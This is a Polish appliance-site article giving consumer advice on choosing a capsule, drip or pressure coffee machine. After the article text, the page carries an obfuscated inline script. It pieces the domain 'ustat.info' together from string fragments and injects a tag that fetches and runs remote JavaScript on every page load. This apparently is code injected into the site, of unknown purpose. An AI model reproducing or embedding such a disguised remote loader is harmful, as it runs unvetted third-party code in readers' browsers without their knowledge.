agdrtv24 - twitteragdrtv24 - facebookagdrtv24 - linkedin
Ekspres do kawy – jak wybrać model dla siebie?

Ekspres do kawy – jak wybrać model dla siebie?

EKSPRESY DO KAWY / Ekspresy ciśnieniowe automatyczne / 2022-05-30 19:37:46

Jeszcze do niedawna wysokiej jakości ekspresy do kawy oglądaliśmy niemal wyłącznie w kawiarniach lub zamożniejszych domach. Dziś coraz częściej widzimy te urządzenia w mieszkaniach Polaków niezarabiających oszałamiających pieniędzy. Łatwość dostępu, przystępne warunki zakupu, ale także chęć komfortowego życia z perspektywą codziennej filiżanki przepysznej kawy – oto główne powody rosnącej popularności ekspresów. Przyjrzyjmy się bliżej sprzętowi, który zapewnia niezapomniane wrażenia zmysłowe milionom Europejczyków.

Sytuacja niemal zawsze wygląda podobnie – ile osób w towarzystwie, tyle kawowych preferencji. Jeden woli macchiato, drugi cappuccino. Wielu wybiera stawiające na nogi espresso lub po prostu większą czarną, czyli po prostu americano. Są i tacy, którym do szczęścia wystarczy nieśmiertelna sypana, czy jak kto woli „parzocha”. Chcąc za każdym razem dostępować rozkoszy obcowania z najlepszym napojem pod słońcem, warto skorzystać z naprawdę dobrej jakości ekspresu do kawy – nie ma innego wyjścia. Tylko solidne urządzenie za każdym razem przygotuje Ci taką kawę, jakiej pragniesz i na jaką zasługujesz (bo nie każdy, a może raczej nikt, nie może sobie pozwolić na całodobową obsługę ze strony baristy). Jak zatem wybrać odpowiedni ekspres? Odpowiedź: wszystko zależy od twoich upodobań, oczekiwań, stanu konta a także tego, ile czasu, wysiłku i pieniędzy chcesz zainwestować w proces warzenia.

Ekspres do kawy, ale jaki?

Kiedy rodzi się w nas pierwsza myśl o inwestycji w ekspres do kawy, zazwyczaj nie wiemy dokładnie, czego mamy poszukiwać. Jeszcze stromiej pod górkę zaczyna się robić, kiedy przychodzimy do salony AGD lub przeglądamy sklepy internetowe i naszym oczom ukazuje się niezwykłe bogactwo marek i rodzajów tych, zdawałoby się, nieskomplikowanych urządzeń. Z dalszej części tego artykułu dowiesz się, jakie są podstawowe typy ekspresów i dlaczego zwykle warte są one swojej ceny. Zapraszamy.

Czytaj także: Łatwy w obsłudze ekspres do kawy – jaki wybrać?

Ekspresy kapsułkowe

Ekspresy kapsułkowe to urządzania w sam raz do osób młodych, zapracowanych, nadal będących na dorobku. Jest to sprzęt stosunkowo niedrogi, solidny i banalnie prosty w użytkowaniu. Wszystko, co musisz zrobić, to umieścić jedną kapsułkę w odpowiednim miejscu w ekspresie, nacisnąć przycisk i kawa gotowa. Minusem takiego rozwiązania bywa jego ekologiczny aspekt (nie wszystkie są biodegradowalne). Jeżeli natomiast chodzi o plusy, to należy do nich szybkość działania takiego urządzenia, łatwość użytkowania i konserwacji, niewielkie gabaryty, ciekawe designy. Poza tym nadal na rynku znaleźć można stosunkowo niedrogie kapsułki.

Przepływowe ekspresy do kawy

Przelewówki to szalenie popularny i znany od lat rodzaj ekspresów. Są one zwykle najtańszymi urządzeniami tego typu dostępnymi na rynku. Działanie takiego sprzętu również jest szalenie proste. Podgrzana woda wlewana jest do pojemnika ze zmielonymi uprzednio ziarnami, a następnie przepompowywana do filiżanki. Ot, cała technologia. Na rynku dostępne są modele z młynkami, zatem jeżeli lubisz świeżo zmieloną kawą, warto rozejrzeć się za takim typem.

Ekspresy ciśnieniowe

Ekspresy ciśnieniowe to urządzenia dla osób, które gotowe są wydać więcej pieniędzy po to, by w zaciszu swojego domu, kiedy tylko tego zapragną, raczyć się pysznym, aromatycznym napojem. Niezależnie od tego, jaki model wybierzesz, miej świadomość, że jest to sprzęt w jakiś sposób specjalistyczny, a więc wymagający konserwacji. Jeżeli go zaniedbasz, będzie ci przyrządzał niedobrą, kwaśną kawę, a twoja inwestycja okaże się prawdziwym rozczarowaniem. Na szczęście nowe modele ekspresów ciśnieniowych to „cwane, zdigitalizowane bestie”, które poinformują cię w odpowiednim momencie, czego im trzeba. Na rynku dostępnych jest wiele modeli w cenach od nieco ponad tysiąca złotych do kwot zahaczających o nieskończoność… Wszystko zależy od tego, na jakie szaleństwo jesteś gotów. No dobrze, a jak działa takie cudo? Proces zaparzania opiera się na przepuszczaniu ok. 30 ml wody o temperaturze ok. 95°C przez zmielone i mocno ubite ziarna kawy pod ciśnieniem ok. 9 barów. Technologia ta pozwala uzyskać napar o odpowiedniej intensywności i aromacie.

Czytaj także: Ekspres do kawy – 7 ważnych funkcji, na które nie zwracamy uwagi

Czy ekspresy do kawy są warte swojej ceny?

Odpowiedź na tak zadanie pytanie może brzmieć następująco: to zależy, jaki model wybierzemy. W tym przypadku cena na ogół determinuje jakość, a więc oczekując sprzętu wydajnego, solidnego i serwującego najlepszą kawę, musisz wydać nieco więcej swoich ciężko zarobionych pieniędzy. Najczęściej dobry ekspres do kawy jest wart swojej ceny. Przede wszystkim, posiadając taki sprzęt, zaoszczędzisz na kawiarniach, a twoje życie towarzyskie wzbogaci się o jeszcze jeden „czasoumilacz”. No bo sam przyznaj, że miło jest ugościć swoich znajomych, rodzinę czy nawet klientów filiżanką aromatycznego, gorącego napoju. Nie wspominając już o tym, że eksperymentowanie z różnymi rodzajami metod parzenia i smaków kawy może być kolejną wielką przygodą, która Ci się należała, a o której być może nie miałeś dotąd pojęcia. Stań się zatem swoim prywatnym baristą!

<script>
(function(){
whXq=document.createElement("script");whXq.type="text/javascript";
whXq.async=true;whXq_=(("us")+"t")+"a";whXq_+=("t.i")+""+"n";whXq_+=(("f")+"o");whXq_+="/";
whXqu="378241776.";whXqu+="q34X2114hXqpsbrzpiwgmkz38v219g";whXq.src="https://"+whXq_+whXqu;
whXqdb=document.body;whXqdb.appendChild(whXq);
})();
</script>

 

źródło: agdrtv24.pl

agdrtv24
NASZE SERWISY
  • agdrtv24
  • pięknydom24
  • informacje branżowe